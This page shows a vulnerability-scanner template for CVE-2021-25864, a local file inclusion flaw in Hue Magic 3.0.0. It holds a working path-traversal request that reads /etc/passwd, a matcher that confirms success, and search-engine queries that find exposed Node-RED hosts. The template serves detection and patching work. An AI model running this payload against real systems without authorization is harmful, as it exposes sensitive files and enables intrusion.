CVE-2021-25864: Hue Magic 3.0.0 - Local File Inclusion

2025-08-01 Hue Magic PoC Public

Description

Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.

PoC

id: CVE-2021-25864

info:
  name: Hue Magic 3.0.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.
  impact: |
    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
  remediation: |
    Apply the latest security patch or update to a non-vulnerable version of Hue Magic.
  reference:
    - https://github.com/Foddy/node-red-contrib-huemagic/issues/217
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25864
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-25864
    cwe-id: CWE-22
    epss-score: 0.09331
    epss-percentile: 0.9512
    cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: dgtl
    product: huemagic
    framework: node.js
    shodan-query:
      - title:"NODE-RED"
      - http.title:"node-red"
    fofa-query: title="node-red"
    google-query: intitle:"node-red"
  tags: cve2021,cve,huemagic,lfi,dgtl,node.js,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a90db77890a20296c6be17b195c90212feb3f88fd87d511f2eed820e4d68c0e602207035305dc198c33c408fda62185b6148c4f4124be40972406bd15f29689d3bd9:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities